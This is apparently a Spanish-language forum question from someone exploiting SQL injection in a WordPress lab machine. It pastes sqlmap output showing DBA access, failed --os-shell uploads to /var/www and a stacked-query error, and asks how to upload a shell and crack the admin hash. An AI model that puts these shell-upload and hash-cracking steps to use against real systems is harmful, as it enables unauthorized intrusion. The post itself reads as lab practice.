Encontré una vulnerabilidad de inyección SQL en una instalación de Wordpress dentro de una de mis máquinas de laboratorio y estoy tratando de aprovecharla para subir un shell.
Puedo obtener el hash de administrador, pero parece que es bastante complejo, ya que JTR y HASHCAT están tomando mucho tiempo sin suerte.
Aquí está el resultado básico de SQLmap:
web server operating system: Linux Ubuntu xxxxxxxxx
web application technology: PHP 5.2.6, Apache 2.2.11
back-end DBMS: MySQL 5
[02:24:38] [INFO] testing if current user is DBA
[02:24:38] [INFO] fetching current user
current user is DBA: True
[02:24:38] [INFO] fetching database names
[02:24:38] [INFO] the SQL query used returns 3 entries
[02:24:38] [INFO] resumed: "information_schema","information_schema"
[02:24:38] [INFO] resumed: "mysql","mysql"
[02:24:38] [INFO] resumed: "wordpress","wordpress"
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
Probé la opción --os-shell
pero parece que no hay acceso de escritura cuando obtengo estos errores:
[02:26:36] [ADVERTENCIA] no se puede recuperar automáticamente ningún servidor web ruta
[02:26:36] [INFO] intentando cargar el archivador en '/ var / www' a través de LIMITE EN LA TECNOLOGIA DEL PERFIL
[02:26:37] [ADVERTENCIA] no se puede cargar el archivador en '/ var / www'
[02:26:37] [INFO] intentando cargar el archivador en '/ var / www' a través de Técnica de UNION
[02:26:37] [ADVERTENCIA] espere caracteres no deseados dentro del archivo como un sobras de la consulta UNION
[02:26:38] [ADVERTENCIA] parece que el archivo no se ha escrito, esto puede ocurrir si el usuario del proceso DBMS no tiene privilegios de escritura en el ruta de destino
Puedo obtener --sql-shell sin problema. Intenté los pasos aquí ( enlace ) para cargar un shell, pero aparece el siguiente error
[02:00:16] [ADVERTENCIA] la ejecución de consultas SQL personalizadas solo está disponible cuando las consultas apiladas son compatibles
Ahora, necesito una forma de cargar un shell en la máquina de destino, ¿alguna idea? ¿También alguna idea donde puedo descifrar hash de contraseña de administrador de Wordpress en línea?